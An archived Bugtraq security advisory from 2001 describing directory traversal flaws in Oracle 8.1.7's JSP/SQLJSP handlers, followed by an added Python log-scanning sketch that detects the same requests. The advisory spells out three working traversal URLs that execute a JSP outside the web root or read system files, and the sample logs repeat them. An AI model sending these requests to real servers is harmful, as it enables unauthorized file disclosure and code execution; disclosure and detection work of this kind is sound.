Bugtraq mailing list archives

Oracle JSP/SQLJSP handlers allow viewing files and executing JSP outside the web root
From: Georgi Guninski <guninski () GUNINSKI COM>
Date: Mon, 22 Jan 2001 17:35:55 +0200

Georgi Guninski security advisory #36, 2001

Oracle JSP/SQLJSP handlers allow viewing files and executing JSP outside the web root

Systems affected:
Oracle JSP/SQLJSP handlers, installed by default with Oracle 8.1.7 on Windows 2000.
Have not tested on other versions, but they may be vulnerable.

Risk: High
Date: 22 January 2001

Legal Notice:
This Advisory is Copyright (c) 2001 Georgi Guninski. You may distribute it unmodified.
You may not modify it and distribute it or distribute parts of it without the author's
written permission.

Disclaimer:
The opinions expressed in this advisory and program are my own and not of any company.
The usual standard disclaimer applies, especially the fact that Georgi Guninski
is not liable for any damages caused by direct or  indirect use of the information
or functionality provided by this advisory or program.
Georgi Guninski bears no responsibility for content or misuse of this advisory or program or
any derivatives thereof.


Description:
It is possible to view files outside the web root.
Also possible is execution of .JSP files outside the web root on the same partition as
the web server's root.


Details:
I guess there are at least 2 vulnerabilities with JSP/SQLJSP handlers.
Basically these are directory traversal vulnerabilities.
1) The following URL:
---------------------------------------
http://oraclehost/servlet//..//../o.jsp
---------------------------------------
will execute c:\o.jsp if there is such a file.
As a side effect this shall create the directory C:\servlet\_pages\_servlet and shall put
in it the java source and .class file of o.jsp

2) The following URL:
-------------------------------------------------------------
http://oraclehost/a.jsp//..//..//..//..//..//../winnt/win.ini
-------------------------------------------------------------
shall read c:\winnt\win.ini. It is normal to receive an error to this request. To see the result
go to: http://oraclehost/_pages and look in the directories for .java files containing "win"

3) The following URL:
-----------------------------------------------------------------
http://oraclehost/bb.sqljsp//..//..//..//..//..//../winnt/win.ini
-----------------------------------------------------------------
shall read c:\winnt\win.ini. It is normal to receive an error to this request. To see the result
go to: http://oraclehost/_pages and look in the directories for .java files containing "win"

Note: all URLs were tested with Netscape 4.76 or direct HTTP requests. They do not work with IE.


Vendor status:
Oracle was contacted on 18 January 2001.

Regards,
Georgi Guninski
http://www.guninski.com
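
A detection sketch for the three request shapes in the advisory, added here as an example and not part of the original post: it scans web access logs for requests whose path starts at the /servlet, .jsp or .sqljsp handler and then climbs above the web root, and for fetches of .java files under /_pages. The log lines, addresses, function names and the /_pages/example path are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Handler prefixes taken from the advisory's URLs: /servlet, *.jsp, *.sqljsp
HANDLER = re.compile(r"^/+(?:servlet|[^/]+\.(?:sql)?jsp)(?=[/\\]|$)", re.I)
PAGES_SOURCE = re.compile(r"^/+_pages/.*\.java$", re.I)
REQUEST = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')

def decode(path):
    """Percent-decode repeatedly so double-encoded dot segments are seen too."""
    prev = None
    while prev != path:
        prev, path = path, unquote(path)
    return path

def escape_depth(path):
    """Levels the path climbs above the web root; 0 means it stays inside."""
    depth = lowest = 0
    for seg in re.split(r"[/\\]+", path):
        if seg in ("", "."):
            continue
        depth += -1 if seg == ".." else 1
        lowest = min(lowest, depth)
    return -lowest

def classify(line):
    """Return a finding label for one access-log line, or None."""
    m = REQUEST.search(line)
    if not m:
        return None
    path = decode(m.group(1).split("?", 1)[0])
    if escape_depth(path) > 0:
        return "handler-traversal" if HANDLER.match(path) else "traversal"
    return "pages-source-read" if PAGES_SOURCE.match(path) else None

# Constructed sample log lines (Common Log Format, documentation addresses)
SAMPLE_LOG = [
    '192.0.2.10 - - [22/Jan/2001:17:40:01 +0200] "GET /servlet//..//../o.jsp HTTP/1.0" 200 312',
    '192.0.2.10 - - [22/Jan/2001:17:40:09 +0200] "GET /a.jsp//..//..//..//..//..//../winnt/win.ini HTTP/1.0" 500 0',
    '192.0.2.10 - - [22/Jan/2001:17:40:15 +0200] "GET /bb.sqljsp//..//..//..//..//..//../winnt/win.ini HTTP/1.0" 500 0',
    '192.0.2.77 - - [22/Jan/2001:17:41:00 +0200] "GET /index.jsp?id=7 HTTP/1.0" 200 5120',
    '192.0.2.10 - - [22/Jan/2001:17:41:30 +0200] "GET /_pages/example/_win.java HTTP/1.0" 200 940',
]

def scan(lines):
    return [(n, label) for n, line in enumerate(lines, 1) if (label := classify(line))]

if __name__ == "__main__":
    print(scan(SAMPLE_LOG))
```

The 500 responses in the sample match the advisory's remark that an error on the traversal request is normal, so status code alone is not a reliable filter.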

